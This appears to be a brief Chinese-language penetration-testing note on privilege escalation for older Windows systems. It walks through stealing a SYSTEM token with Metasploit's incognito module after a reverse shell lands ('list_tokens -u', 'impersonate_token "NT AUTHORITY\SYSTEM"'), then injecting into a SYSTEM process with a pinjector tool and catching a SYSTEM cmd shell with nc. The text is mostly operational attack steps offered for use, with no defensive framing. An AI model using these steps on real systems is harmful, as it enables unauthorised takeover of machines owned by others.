令牌窃取(鸡肋玩意 2008包括2008以下)
令牌,又叫token,是系统临时产生的秘钥,相当于账号密码,用来决定是否允许此次请求和判断此次请求是属于哪一个用户。
win7一下的版本可以尝试
这里使用msf上自带的令牌窃取模块
msf反弹shell上线后
查看一下当前权限
use incognito 使用模块
list_tokens -u 列出有system的token
impersonate_token "NT AUTHORITY\SYSTEM" 获取token
获取成功
权限为system
进程注入(鸡肋玩意2008之前版本。2008都不行)
每个应用程序运行的时候会有进程详细信息
像这个。
进程注入就是利用其他应用进程需要使用的system权限来实现我们想要的操作
下载pininject 软件
然后运行查看你system 的pid
然后 -p pid cmd.exe 端口号
然后开个nc会反弹一个cmd窗口
权限是system